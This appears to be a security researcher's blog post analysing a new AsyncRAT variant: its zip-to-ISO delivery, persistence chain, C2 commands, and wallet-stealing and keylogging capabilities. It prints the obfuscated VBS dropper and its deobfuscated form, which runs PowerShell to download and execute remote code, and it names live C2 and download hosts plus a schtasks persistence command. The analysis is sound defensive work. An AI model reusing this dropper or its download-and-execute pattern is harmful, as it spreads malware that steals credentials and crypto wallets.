👽New AsyncRAT Variation Malware Analysis

References:

• https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign

• https://www.zscaler.com/blogs/security-research/njrat-pushes-lime-ransomware-and-crypto-wallet-grabbers

• https://github.com/joren485/HollowProcess

• https://www.youtube.com/watch?v=x_pnNdkL_uk

Artifacts can be found here: https://git.landon.pw/r/malware-analysis/tree/main/async-rat

Background

During an incident investigation, we uncovered a new variation of the AsyncRAT threat campaign. This follows closely with MorphieSec’s analysis, but there are some differences to be noted.

Original Email Link: hxxp://webmail.spectrum.net/index.php/mail/viewmessage/getattachment/uniqueId/137694/account/0/filenameOriginal/ZXNHUCET67WGFYUH23HJ32F32.zip/filenameModified/ZXNHUCET67WGFYUH23HJ32F32.zip?folder=SU5CT1g%253D

The email link downloads zxnhucet67wgfyuh23hj32f32.zip. It is a ZIP archive containing an ISO disk image with the same name as the zip: ZXNHUCET67WGFYUH23HJ32F32.iso. Once mounted, the disk image contains PZKFEUUD76631.vbs.

Dropper Analysis

The malware starts at the PZKFEUUD76631.vbs. The VBS script employs basic obfuscation to call PowerShell, which downloads the contents of hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt and executes it.

GFEIIPQN = ("t.S")
RZJIXQMY = ("p"+GFEIIPQN+"h")
QGKTYAJN = ("ri"+RZJIXQMY+"el")
YQKXLMIK = ("Sc")
Set JLVWAYWB = CreateObject("W"+YQKXLMIK+QGKTYAJN+"l")
WQRUDORK = "m"
YKPMWRKW = "po"
ZSNVRCYD = "el"
IPHJRZXC = "sh"
XTDPCXDY = "l -Co"
TLSQCTOM = "wer"
EWCOIBQW = "man"
SYFBMBZE = "d [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.Visua"
RBHSUTBB = "lBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,"
YCAFQCOE = "'__#$_____!___'.Replace('__#$__','http://hennhaus.co').Replace('___!___','m/wp-includes/images/wlw/pomo/wo/xx.txt'))|IE"
BMUYOXSY = "X;[Byte[]]"
JLVWAYWB.Run YKPMWRKW+TLSQCTOM+IPHJRZXC+ZSNVRCYD+XTDPCXDY+WQRUDORK+EWCOIBQW+SYFBMBZE+RBHSUTBB+YCAFQCOE+BMUYOXSY,0

# Deobfuscated
Set JLVWAYWB = CreateObject("Wscript.Shell")
JLVWAYWB.Run powershell -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/xx.txt')|IEX;[Byte[]], 0

The script downloaded creates persistence. It creates a few files:

• img.ps1 (From hxxp://hennhaus.com/wp-includes/images/wlw/pomo/wo/1.txt)

• xx.bat - Creates scheduled task to run img.vbs

• img.vbs - Runs img.bat

• img.bat - Executes the img.ps1 PowerShell

• xx.vbs - Runs xx.bat

All of these files are stored in the C:\ProgramData\img\ISO directory.

So all-in-all, the action flow is as follows: zip -> iso -> vbs -> xx.vbs -> xx.bat -> img.vbs -> img.bat -> img.ps1

img.ps1 does a couple of things to initiate the malicious payload. It first declares a few variables:

Then, it grabs the HWID and AV product of the machine.

Next, it sends information about the machine to the mo1010.duckdns.org:4000 web server. It packs all of the information: HWID, AV, OS, computer name, and username, and passes it as a User-Agent in the request header.

Dependent on the response of the request, there’s twelve commands the PowerShell can run. The script splits the response and uses the first element in the array as the command.

Here are the commands and what they do:

• ‘close’: Stops the script

• ‘restart’: Stops the script and re-opens it

• ‘UNS’: Stops the script and deletes it (uninstall)

• ‘DW’: Writes bytes to a file in the temp folder

• ’exc’: Downloads file to the temp folder

• ‘memory’: Loads an assembly into the application domain

• ‘bot’: Invokes the BotKiller class from reflected PE

• ‘PE’: Invokes the SendtoMemory class from reflected PE

• ‘vurl’: Runs the second argument of the response

• ‘hurl’: Navigates to a website via Internet Explorer in an invisible window

• ‘shellfuc’: Similar to vurl, except with a hidden window

• ‘Note’: Writes to registry key HKEY_CURRENT_USER\SOFTWARE\<hwid>\Note

These are guesses on the usage, as there is no way to be sure without seeing the request response. Either the ‘DW’ or ’exc’ command cause the final stage of the malware to be dropped on the machine. It downloads 1.ps1 to %appdata%\Local\Temp.

Payload Analysis

1.ps1 contains two helper functions, Binary2String and HexaToByte. These functions are used to decode two strings, $serv and $DATA:

I wrote a small Python script to convert the bytes into a file, and ran file RF5X and file TyXC3 to determine the file types of the payloads.

I began some basic PE analysis of the two files. I used XPEViewer to look at the version info (specifically, the StringFileInfo.OriginalFilename) and found that $RF5X is Stub.exe and TyXC3 is runpe.dll. Further analysis of the runpe.dll shows it is packed with ConfuserEx-- an open source PE obfuscator and packer. runpe.dll uses the RunPE process hollowing technique to start an aspnet_compiler.exe process and inject the payload (Stub.exe) in it.

Manalyzer catches some interesting behavior about Stub.exe. There are checks for VMWare and Sandboxie present. Some other references that are interesting that Manalyzer missed that I discovered through static analysis:

• System.Collections.IEnumerable.GetEnumerator - Possibly to enumerate all files (ie: ransomware capabilities)

• Google Chrome ‘MetaMask’ extension

• Exodus Wallet exodus.conf.json

• Bitcoin settings.json

• Atomic cookies

• Bitcoin Core

• VirtualBox check

• AES, MD5 CryptoServiceProvider

• Task Scheduler

• Select * from AntivirusProduct

• AnyDesk

• Offkeylogger

• asynclogs.txt

• “masterKey”

• sendPlugin, savePlugin

• 

From just looking at the strings, there is a pretty clear idea on what this malware does. There are a few references to crypto wallets: Exodus, MetaMask, and Atomic, and their relevant configuration files– so probably a crypto stealer feature. There is also a reference to “AnyDesk” and “Offkeylogger”, so remote viewing is probably provided by AnyDesk and the ability to log keystrokes. There are also multiple references to cryptography: AES and MD5 CryptoServiceProvider as well as a “master key”. This indicates a high likelihood that the malware has ransomware capabilities.

Further, there is also reference to scheduled task via /c schtasks /create /f /sc onlogon /rl highest /tn " which references the registry location: Software\Microsoft\Windows\CurrentVersion\Run. This is to create persistence and run the malware at login.

Dynamic testing of the malware confirms these suspicions. When ran, multiple Dialog boxes opened, and the threat actor asked “What are you working on” as well as “Are you from Paris or London?”. Eventually, they prompted me to add them on Telegram or ICQ, which I added them on Telegram. They operate under the handle @BusinessIsLife. After a while of talking on Telegram, the threat actor began to delete and rename files on the VM. It was actually a pretty cool experience to communicate with the threat actor during the analysis.

Nevertheless, the dynamic testing proved the malware’s ability to interact with the host, proving it’s capabilities as a RAT. Based on the testing and information available at this time, it seems the malware is a variant of the AsyncRAT family, with the ability to steal crypto wallets. Another possible related malware is the njRAT LIME variant. During investigation on runpe.dll, I discovered a YouTube video: “RunPe Dll In C# By neutron” and at 4:23, there are references to njRAT.exe and Stub.manifest, which could possibly link to Stub.exe.

That’s all for the analysis of this malware. Thanks for reading, and I hope the information provided was clear and succinct, yet informative. Feel free to connect with me on my socials, I plan to continue the malware analysis and will post updates there:

LinkedIn: https://linkedin.com/in/landoncrabtree

Artifacts / IoC